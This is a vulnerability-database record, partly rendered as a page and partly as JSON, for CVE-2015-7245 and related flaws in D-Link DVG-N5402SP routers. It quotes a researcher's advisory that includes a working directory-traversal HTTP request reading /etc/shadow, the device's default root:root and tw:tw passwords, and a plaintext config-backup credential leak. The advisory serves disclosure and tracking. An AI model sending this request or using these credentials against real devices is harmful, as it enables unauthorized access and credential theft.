VAR-201704-0218

Vulnerability from variot - Updated: 2024-02-13 01:49

Directory traversal vulnerability in D-Link DVG-N5402SP with firmware W1000CN-00, W1000CN-03, or W2000EN-00 allows remote attackers to read sensitive information via a .. (dot dot) in the errorpage parameter. ( Dot dot ) including errorpage Important information may be read via parameters. The D-Link DVG-N5402SP is a wireless router product from D-Link for voice, fax and shared wireless Internet over IP networks. An attacker could exploit this vulnerability to read arbitrary files. DLink DVG­N5402SP is prone to multiple security vulnerabilities. Attackers can leverage these issues to bypass the authentication mechanism and gain access to the vulnerable device, use directory-traversal characters ('../') and obtain sensitive information; other attacks are also possible. DLink DVG­N5402SP File Path Traversal, Weak Credentials Management, and Sensitive Info Leakage Vulnerabilities

Timelines Reported to CERT + Vendor: August 2015 Dlink released beta release: Oct 23, 2015 New fix release: MD5 (GRNV6.1U23J-83-DL-R1B114-SG_Normal.EN.img) = 04fd8b901e9f297a4cdbea803a9a43cb No public disclosure till date - Dlink waiting for Service providers to ask for new release + CERT opted out

Vulnerable Models, Firmware, Hardware versions DVG­N5402SP Web Management Model Name : GPN2.4P21­C­CN Firmware Version : W1000CN­00 Firmware Version :W1000CN­03 Firmware Version :W2000EN­00 Hardware Platform :ZS Hardware Version :Gpn2.4P21­C_WIFI­V0.05

Device can be managed through three users: 1. super ­ full privileges 2. admin ­ full privileges 3. support ­ restricted user

1. CVE-ID*: CVE-2015-7245

*HTTP Request *

POST /cgi­bin/webproc HTTP/1.1 Host: :8080 User­Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept­Language: en­US,en;q=0.5 Accept­Encoding: gzip, deflate Referer: http://:8080/cgi­bin/webproc Cookie: sessionid=abcdefgh; language=en_us; sys_UserName=super Connection: keep­alive Content­Type: application/x­www­form­urlencoded Content­Length: 223

getpage=html%2Findex.html&errorpage=../../../../../../../../../../../etc/shadow&var%3Amenu=setup&var%3Apage=connected&var% &obj­action=auth&%3Ausername=blah&%3Apassword=blah&%3Aaction=login&%3Asessionid=abcdefgh

HTTP Response

HTTP/1.0 200 OK pstVal­>name:getpage; pstVal­>value:html/main.html pstVal­>name:getpage; pstVal­>value:html/index.html pstVal­>name:errorpage; pstVal­>value:../../../../../../../../../../../etc/shadow pstVal­>name:var:menu; pstVal­>value:setup pstVal­>name:var:page; pstVal­>value:connected pstVal­>name:var:subpage; pstVal­>value:­ pstVal­>name:obj­action; pstVal­>value:auth pstVal­>name::username; pstVal­>value:super pstVal­>name::password; pstVal­>value:super pstVal­>name::action; pstVal­>value:login pstVal­>name::sessionid; pstVal­>value:1ac5da6b Connection: close Content­type: text/html Pragma: no­cache Cache­Control: no­cache set­cookie: sessionid=1ac5da6b; expires=Fri, 31­Dec­9999 23:59:59 GMT; path=/

root::13796:0:99999:7:::

root::13796:0:99999:7:::

tw::13796:0:99999:7:::

tw::13796:0:99999:7:::

2. Use of Default, Hard­Coded CredentialsCVE-ID: CVE-2015-7246

The device has two system user accounts configured with default passwords (root:root, tw:tw). Login ­ tw ­ is not active though. Anyone could use the default password to gain administrative control through the Telnet service of the system (when enabled) leading to integrity, loss of confidentiality, or loss of availability.

3.Sensitive info leakage via device running configuration backup * CVE-ID*: CVE-2015-7247

Usernames, Passwords, keys, values and web account hashes (super & admin) are stored in clear­text and not masked. It is noted that restricted 'support' user may also access this config backup file from the portal directly, gather clear-text admin creds, and gain full, unauthorized access to the device. -- Best Regards, Karn Ganeshen ipositivesecurity.blogspot.in

Show details on source website

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201704-0218",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "dvg-n5402sp",
        "scope": "eq",
        "trust": 2.4,
        "vendor": "d link",
        "version": "w1000cn-00"
      },
      {
        "model": "dvg-n5402sp",
        "scope": "eq",
        "trust": 2.4,
        "vendor": "d link",
        "version": "w1000cn-03"
      },
      {
        "model": "dvg-n5402sp",
        "scope": "eq",
        "trust": 2.4,
        "vendor": "d link",
        "version": "w2000en-00"
      },
      {
        "model": "dvg\\303\\202\\302\\255n5402sp",
        "scope": null,
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2016-01164"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-007543"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201602-370"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-7245"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:d-link:dvg-n5402sp_firmware:w1000cn-00:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:d-link:dvg-n5402sp_firmware:w1000cn-03:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:d-link:dvg-n5402sp_firmware:w2000en-00:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dvg-n5402sp:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2015-7245"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Karn Ganeshen",
    "sources": [
      {
        "db": "BID",
        "id": "82754"
      },
      {
        "db": "PACKETSTORM",
        "id": "135590"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201602-370"
      }
    ],
    "trust": 1.0
  },
  "cve": "CVE-2015-7245",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 5.0,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 5.0,
            "confidentialityImpact": "Partial",
            "exploitabilityScore": null,
            "id": "CVE-2015-7245",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 8.6,
            "id": "CNVD-2016-01164",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.6,
            "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "NONE",
            "baseScore": 5.0,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "VHN-85206",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 3.9,
            "impactScore": 3.6,
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.0"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 7.5,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2015-7245",
            "impactScore": null,
            "integrityImpact": "None",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2015-7245",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2016-01164",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201602-370",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-85206",
            "trust": 0.1,
            "value": "MEDIUM"
          },
          {
            "author": "VULMON",
            "id": "CVE-2015-7245",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2016-01164"
      },
      {
        "db": "VULHUB",
        "id": "VHN-85206"
      },
      {
        "db": "VULMON",
        "id": "CVE-2015-7245"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-007543"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201602-370"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-7245"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Directory traversal vulnerability in D-Link DVG-N5402SP with firmware W1000CN-00, W1000CN-03, or W2000EN-00 allows remote attackers to read sensitive information via a .. (dot dot) in the errorpage parameter. ( Dot dot ) including errorpage Important information may be read via parameters. The D-Link DVG-N5402SP is a wireless router product from D-Link for voice, fax and shared wireless Internet over IP networks. An attacker could exploit this vulnerability to read arbitrary files. DLink DVG\u00c2\u00adN5402SP is prone to multiple security vulnerabilities. \nAttackers can leverage these issues to bypass the authentication  mechanism and gain access to the vulnerable device, use  directory-traversal characters (\u0027../\u0027) and obtain sensitive information;  other  attacks are also possible.  DLink DVG\u00adN5402SP File Path Traversal, Weak Credentials Management, and\nSensitive Info Leakage Vulnerabilities\n\n*Timelines*\nReported to CERT + Vendor: August 2015\nDlink released beta release: Oct 23, 2015\nNew fix release: MD5 (GRNV6.1U23J-83-DL-R1B114-SG_Normal.EN.img) =\n04fd8b901e9f297a4cdbea803a9a43cb\nNo public disclosure till date - Dlink waiting for Service providers to ask\nfor new release + CERT opted out\n\n\n*Vulnerable Models, Firmware, Hardware versions*\nDVG\u00adN5402SP Web Management\nModel Name : GPN2.4P21\u00adC\u00adCN\nFirmware Version : W1000CN\u00ad00\nFirmware Version :W1000CN\u00ad03\nFirmware Version :W2000EN\u00ad00\nHardware Platform :ZS\nHardware Version :Gpn2.4P21\u00adC_WIFI\u00adV0.05\n\nDevice can be managed through three users:\n1. super \u00ad full privileges\n2. admin \u00ad full privileges\n3. support \u00ad restricted user\n\n*1. \n*CVE-ID*: CVE-2015-7245\n\n*HTTP Request *\n\nPOST /cgi\u00adbin/webproc HTTP/1.1\nHost: \u003cIP\u003e:8080\nUser\u00adAgent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101\nFirefox/39.0 Accept:\ntext/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept\u00adLanguage: en\u00adUS,en;q=0.5\nAccept\u00adEncoding: gzip, deflate\nReferer: http://\u003cIP\u003e:8080/cgi\u00adbin/webproc\nCookie: sessionid=abcdefgh; language=en_us; sys_UserName=super\nConnection: keep\u00adalive\nContent\u00adType: application/x\u00adwww\u00adform\u00adurlencoded\nContent\u00adLength: 223\n\ngetpage=html%2Findex.html\u0026*errorpage*=../../../../../../../../../../../etc/shadow\u0026var%3Amenu=setup\u0026var%3Apage=connected\u0026var%\n\u0026obj\u00adaction=auth\u0026%3Ausername=blah\u0026%3Apassword=blah\u0026%3Aaction=login\u0026%3Asessionid=abcdefgh\n\n\n*HTTP Response*\n\nHTTP/1.0 200 OK\npstVal\u00ad\u003ename:getpage; pstVal\u00ad\u003evalue:html/main.html\npstVal\u00ad\u003ename:getpage; pstVal\u00ad\u003evalue:html/index.html\npstVal\u00ad\u003ename:errorpage;\npstVal\u00ad\u003evalue:../../../../../../../../../../../etc/shadow\npstVal\u00ad\u003ename:var:menu; pstVal\u00ad\u003evalue:setup\npstVal\u00ad\u003ename:var:page; pstVal\u00ad\u003evalue:connected\npstVal\u00ad\u003ename:var:subpage; pstVal\u00ad\u003evalue:\u00ad\npstVal\u00ad\u003ename:obj\u00adaction; pstVal\u00ad\u003evalue:auth\npstVal\u00ad\u003ename::username; pstVal\u00ad\u003evalue:super\npstVal\u00ad\u003ename::password; pstVal\u00ad\u003evalue:super\npstVal\u00ad\u003ename::action; pstVal\u00ad\u003evalue:login\npstVal\u00ad\u003ename::sessionid; pstVal\u00ad\u003evalue:1ac5da6b\nConnection: close\nContent\u00adtype: text/html\nPragma: no\u00adcache\nCache\u00adControl: no\u00adcache\nset\u00adcookie: sessionid=1ac5da6b; expires=Fri, 31\u00adDec\u00ad9999 23:59:59 GMT;\npath=/\n\n#root:\u003chash_redacted\u003e:13796:0:99999:7:::\nroot:\u003chash_redacted\u003e:13796:0:99999:7:::\n#tw:\u003chash_redacted\u003e:13796:0:99999:7:::\n#tw:\u003chash_redacted\u003e:13796:0:99999:7:::\n\n\n*2. Use of Default, Hard\u00adCoded Credentials**CVE-ID*: CVE-2015-7246\n\nThe device has two system user accounts configured with default passwords\n(root:root, tw:tw). \nLogin \u00ad tw \u00ad is not active though. Anyone could use the default password to\ngain administrative control through the Telnet service of the system (when\nenabled) leading to integrity, loss of confidentiality, or loss of\navailability. \n\n*3.Sensitive info leakage via device running configuration backup *\n*CVE-ID*: CVE-2015-7247\n\nUsernames, Passwords, keys, values and web account hashes (super \u0026 admin)\nare stored in clear\u00adtext and not masked. It is noted that restricted\n\u0027support\u0027 user may also access this config backup file from the portal\ndirectly, gather clear-text admin creds, and gain full, unauthorized access\nto the device. \n-- \nBest Regards,\nKarn Ganeshen\nipositivesecurity.blogspot.in\n\n\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2015-7245"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-007543"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2016-01164"
      },
      {
        "db": "BID",
        "id": "82754"
      },
      {
        "db": "VULHUB",
        "id": "VHN-85206"
      },
      {
        "db": "VULMON",
        "id": "CVE-2015-7245"
      },
      {
        "db": "PACKETSTORM",
        "id": "135590"
      }
    ],
    "trust": 2.7
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-85206",
        "trust": 0.1,
        "type": "unknown"
      },
      {
        "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=39409",
        "trust": 0.1,
        "type": "exploit"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-85206"
      },
      {
        "db": "VULMON",
        "id": "CVE-2015-7245"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2015-7245",
        "trust": 3.6
      },
      {
        "db": "PACKETSTORM",
        "id": "135590",
        "trust": 2.7
      },
      {
        "db": "EXPLOIT-DB",
        "id": "39409",
        "trust": 1.8
      },
      {
        "db": "BID",
        "id": "82754",
        "trust": 0.9
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-007543",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201602-370",
        "trust": 0.7
      },
      {
        "db": "CNVD",
        "id": "CNVD-2016-01164",
        "trust": 0.6
      },
      {
        "db": "VULHUB",
        "id": "VHN-85206",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2015-7245",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2016-01164"
      },
      {
        "db": "VULHUB",
        "id": "VHN-85206"
      },
      {
        "db": "VULMON",
        "id": "CVE-2015-7245"
      },
      {
        "db": "BID",
        "id": "82754"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-007543"
      },
      {
        "db": "PACKETSTORM",
        "id": "135590"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201602-370"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-7245"
      }
    ]
  },
  "id": "VAR-201704-0218",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2016-01164"
      },
      {
        "db": "VULHUB",
        "id": "VHN-85206"
      }
    ],
    "trust": 1.7
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "IoT",
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2016-01164"
      }
    ]
  },
  "last_update_date": "2024-02-13T01:49:30.657000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Top Page",
        "trust": 0.8,
        "url": "http://www.dlink.com/uk/en"
      },
      {
        "title": "Kenzer Templates [5170] [DEPRECATED]",
        "trust": 0.1,
        "url": "https://github.com/arpsyndicate/kenzer-templates "
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2015-7245"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-007543"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-22",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-85206"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-007543"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-7245"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.7,
        "url": "http://packetstormsecurity.com/files/135590/d-link-dvg-n5402sp-path-traversal-information-disclosure.html"
      },
      {
        "trust": 2.1,
        "url": "http://seclists.org/fulldisclosure/2016/feb/24"
      },
      {
        "trust": 1.9,
        "url": "https://www.exploit-db.com/exploits/39409/"
      },
      {
        "trust": 0.9,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7245"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7245"
      },
      {
        "trust": 0.6,
        "url": "http://www.securityfocus.com/bid/82754"
      },
      {
        "trust": 0.3,
        "url": "http://www.dlink.co.in/"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/22.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/arpsyndicate/kenzer-templates"
      },
      {
        "trust": 0.1,
        "url": "http://\u003cip\u003e:8080/cgi\u00adbin/webproc"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7247"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7246"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2016-01164"
      },
      {
        "db": "VULHUB",
        "id": "VHN-85206"
      },
      {
        "db": "VULMON",
        "id": "CVE-2015-7245"
      },
      {
        "db": "BID",
        "id": "82754"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-007543"
      },
      {
        "db": "PACKETSTORM",
        "id": "135590"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201602-370"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-7245"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2016-01164"
      },
      {
        "db": "VULHUB",
        "id": "VHN-85206"
      },
      {
        "db": "VULMON",
        "id": "CVE-2015-7245"
      },
      {
        "db": "BID",
        "id": "82754"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-007543"
      },
      {
        "db": "PACKETSTORM",
        "id": "135590"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201602-370"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-7245"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2016-02-22T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2016-01164"
      },
      {
        "date": "2017-04-24T00:00:00",
        "db": "VULHUB",
        "id": "VHN-85206"
      },
      {
        "date": "2017-04-24T00:00:00",
        "db": "VULMON",
        "id": "CVE-2015-7245"
      },
      {
        "date": "2016-02-03T00:00:00",
        "db": "BID",
        "id": "82754"
      },
      {
        "date": "2017-05-26T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2015-007543"
      },
      {
        "date": "2016-02-03T20:32:22",
        "db": "PACKETSTORM",
        "id": "135590"
      },
      {
        "date": "2016-02-19T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201602-370"
      },
      {
        "date": "2017-04-24T18:59:00.163000",
        "db": "NVD",
        "id": "CVE-2015-7245"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2016-02-22T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2016-01164"
      },
      {
        "date": "2017-04-28T00:00:00",
        "db": "VULHUB",
        "id": "VHN-85206"
      },
      {
        "date": "2023-04-26T00:00:00",
        "db": "VULMON",
        "id": "CVE-2015-7245"
      },
      {
        "date": "2016-07-05T21:22:00",
        "db": "BID",
        "id": "82754"
      },
      {
        "date": "2017-05-26T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2015-007543"
      },
      {
        "date": "2023-04-27T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201602-370"
      },
      {
        "date": "2023-04-26T18:55:30.893000",
        "db": "NVD",
        "id": "CVE-2015-7245"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201602-370"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "D-Link DVG-N5402SP Directory traversal vulnerability in some firmware",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-007543"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "path traversal",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201602-370"
      }
    ],
    "trust": 0.6
  }
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.


Loading…

Detection rules are retrieved from Rulezet.

Loading…

Loading…